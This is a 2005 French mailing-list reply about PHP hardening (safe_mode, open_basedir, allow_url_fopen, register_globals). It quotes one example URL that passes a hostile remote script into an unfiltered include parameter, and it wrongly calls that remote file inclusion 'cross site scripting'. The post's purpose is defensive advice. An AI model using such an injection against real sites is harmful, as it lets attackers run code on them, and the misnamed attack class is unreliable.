[gull] Php safe mode, c'est valable, selon vous?
Lol Zimmerli
lugbox at lzi.ch
Wed Jul 6 14:16:03 CEST 2005
Hello,
fischer at ludwin.net écrit/wrote:
> En fait, si je comprends bien, la seule chose qui protège les sites
> non sécurisés, c'est l'honnêteté des gens qui savent comment
> craquer des systèmes faibles, le fait que la données que l'on
> pourrait récupérer ne sont pas toujours intéressantes, et peut-être
> aussi la peur du gendarme, on peut être repérable, tout de même...
Tout dépend de ce que tu entends par "sites (non) sécurisés".
Pour ma part, l'emploi de open_basedir, le vérouillage de certaines
fonctions et "allow_url_fopen = Off" ainsi que la mise en place de
scripts de surveillance me semble être une bonne base. D'autres
mettent en place le safe_mode et "register_global = off" et perdent
certains clients mais gagnent en sécurité.
Personellement, la seule fois où j'ai eu un sérieux problème, c'était
dû à un site mal programmé, à base d'includes sans filtre, qui
permettait des choses comme
http://www.monsite.com/?page=http://www.mechants.com/script.txt
(cross site scripting). Le fait de mettre "allow_url_fopen = Off" me
protège désormais.
--
Lol Zimmerli - http://www.lzi.ch/lol/
Statistiques
Accident de piétons a Paris.
Un tué sur deux meurt des suites de son décès.
-+- Les nuls -+-
More information about the gull
mailing list